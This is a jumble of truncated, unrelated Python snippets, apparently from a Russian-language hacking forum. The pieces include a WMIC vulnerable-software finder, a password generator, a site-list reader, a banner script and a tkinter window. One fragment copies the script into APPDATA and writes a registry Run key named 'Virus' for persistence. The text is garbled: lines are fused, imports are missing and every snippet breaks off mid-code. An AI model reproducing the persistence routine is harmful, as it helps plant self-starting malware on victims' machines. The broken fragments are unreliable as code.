from subprocess import check_output
import argparse
from termcolor import *
import colorama
colorama.init()parser = argparse.ArgumentParser(description='Find vuln PO')
parser.add_argument('-vs', help ='Vuln version PO')
parser.add_argument('-nm', help ='PO Name')
args = parser.parse_args()
vulnvers = args.vs
namepo = args.nm
count = 0
count2 = 0
s = []
s2 = []
a = check_output(["wmic"...
directory = os.getenv("APPDATA") + r'/your_program/'
base_file = directory + os.path.basename(__file__)
if not os.path.exists(directory):
os.makedirs(directory)
shutil.copy(__file__, base_file)
path_to_reestr = OpenKey(HKEY_CURRENT_USER,
r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
0, KEY_ALL_ACCESS)
SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)...
import requests
import random
import glob
import os
import shutil
site = []
files = []
handle = open('sites.txt') # Читаем файл
for x in handle: #Записуем содержимое файла в список
site.append(x)
site = map(lambda s: s.strip(), site) # Удаляем из списка \n
site = list(site) #...
# -*- coding:utf -8 -*-
#!/usr/bin/python3
import random
chars = '+-/*!&$#?=@<>abcdefghijklnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
number = input('количество паролей?'+ "\n")
length = input('длина пароля?'+ "\n")
number = int(number)
length = int(length)
# -*- coding: utf-8 -*- в начале нашего скрипта.from termcolor import *
import colorama
import os
import time
from sys import platform
import requests
import webbrowser
colorama.init()def banner():
cprint('-' * 50,'green')
cprint(' ' * 17 + 'DefendMySystem','red')
cprint('-' * 50,'green')
def...
# -*- coding:utf -8 -*-
from tkinter import *
root = Tk()
root.title("Hello codeby!")
root.resizable(width=False, height=False)
C = Canvas(root, bg="blue", height=330, width=500)
filename = PhotoImage(file = "C:\\black_blue.png")
background_label = Label(root, image=filename)
background_label.place(x=0, y=0, relwidth=1, relheight=1)